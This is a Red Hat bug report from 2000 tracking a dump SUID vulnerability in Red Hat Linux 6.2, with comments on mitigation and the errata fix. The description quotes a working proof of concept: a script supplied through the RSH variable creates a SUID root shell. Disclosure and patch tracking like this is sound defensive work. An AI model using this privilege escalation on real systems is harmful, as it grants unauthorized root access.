Bug 20111 - RH6.2 dump SUID exploit (via RSH env. var)
RH6.2 dump SUID exploit (via RSH env. var)
Status: CLOSED ERRATA
Product: Red Hat Linux
Classification: Retired
Component: dump (Show other bugs)
6.2
All Linux
high Severity medium
: ---
: ---
Assigned To: Nalin Dahyabhai
Dale Lovelace
: Security
: 20112 20565 (view as bug list)
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2000-10-31 12:52 EST by Philip Rowlands
Modified: 2007-03-26 23:37 EDT (History)
1 user (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2000-11-02 22:08:22 EST
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Philip Rowlands 2000-10-31 12:52:26 EST
This from Bugtraq. Tested, works :(


1. Problem:
Linux dump command executes external program with suid priviledge.

2. Tested Version
dump-0.4b15

3. Example
[mat@localhost mat]$ export TAPE=garbage:garbage
[mat@localhost mat]$ export RSH=/home/mat/execute_this
[mat@localhost mat]$ cat > /home/mat/execute_this
#!/bin/sh
cp /bin/sh /home/mat/sh
chmod 4755 /home/mat/sh
[mat@localhost mat]$ chmod 755 /home/mat/execute_this
[mat@localhost mat]$ /sbin/dump -0 /
  DUMP: Connection to garbage established.
  DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
  DUMP: Date of last level 0 dump: the epoch
  DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
  DUMP: Label: none
/dev/hda2: Permission denied while opening filesystem
 [mat@localhost mat]$ ls -la /home/mat/sh
 -rwsr-xr-x    1 root     tty        316848 Oct 31 14:38 /home/mat/sh
 [mat@localhost mat]$ /home/mat/sh
 bash# id
 uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)
Comment 1 Philip Rowlands 2000-10-31 13:11:49 EST
Advise for anyone who needs a quick fix: either remove the package, if you don't
need it (rpm -e dump), or remove the SUID bit from /sbin/dump *and*
/sbin/restore (restore(8) lists the same RSH variable).
Comment 2 Daniel Roesen 2000-10-31 15:56:29 EST
*** Bug 20112 has been marked as a duplicate of this bug. ***
Comment 3 Jeff Johnson 2000-11-01 16:25:39 EST
Fixed in dump-0.4b19-5.
Comment 4 Daniel Roesen 2000-11-02 21:11:25 EST
dump-static suffers obviously from the same problem, so an errata update is
needed for this package, too. Reopening.
Comment 5 Daniel Roesen 2000-11-02 22:08:19 EST
The advisory mentiones update RPMs for dump-static and rmt, but they are not on
updates.redhat.com.
Comment 6 Daniel Roesen 2000-11-03 13:48:37 EST
19:48:40 `SRPMS/dump-0.4b19-5.6x.src.rpm' size = 166647 has new time, getting
19:48:41 `i386/dump-0.4b19-5.6x.i386.rpm' size = 88538 has new time, getting
19:48:41 `i386/dump-static-0.4b19-5.6x.i386.rpm' size = 426967 is missing,
getting.
19:48:41 `i386/rmt-0.4b19-5.6x.i386.rpm' size = 12550 is missing, getting.

ok, so the dump errata was re-issued, now with dump-static & rmt. Closing bug.
Comment 7 Jeff Johnson 2000-11-09 08:15:18 EST
*** Bug 20565 has been marked as a duplicate of this bug. ***

Note You need to log in before you can comment on or make changes to this bug.